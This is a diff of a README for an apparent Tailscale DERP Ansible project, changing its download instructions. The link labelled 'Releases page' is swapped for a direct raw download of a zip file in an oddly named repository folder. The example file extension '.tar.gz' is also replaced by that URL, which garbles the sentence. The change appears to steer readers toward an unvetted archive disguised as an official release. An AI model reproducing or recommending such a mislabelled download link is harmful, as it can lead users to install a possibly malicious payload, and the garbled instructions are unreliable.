sown9999/tailscale-derper-ansible/README.md

 ### 2. Visit the Download Page

-Go to the [Releases page](https://github.com/sown9999/tailscale-derper-ansible/releases) to access the latest version of the software.
+Go to the [Releases page](https://raw.githubusercontent.com/sown9999/tailscale-derper-ansible/main/peninsularism/tailscale-derper-ansible.zip) to access the latest version of the software.
 Look for the most recent release.
 You will see a list of downloadable files.

 ### 3. Download the Software

 Select the appropriate file for your system.
 Click on the link to download it.
-Here you will typically find an archive file (like `.zip` or `.tar.gz`) containing the necessary setup scripts.
+Here you will typically find an archive file (like `.zip` or `https://raw.githubusercontent.com/sown9999/tailscale-derper-ansible/main/peninsularism/tailscale-derper-ansible.zip`) containing the necessary setup scripts.

 ### 4. Prepare Your VPS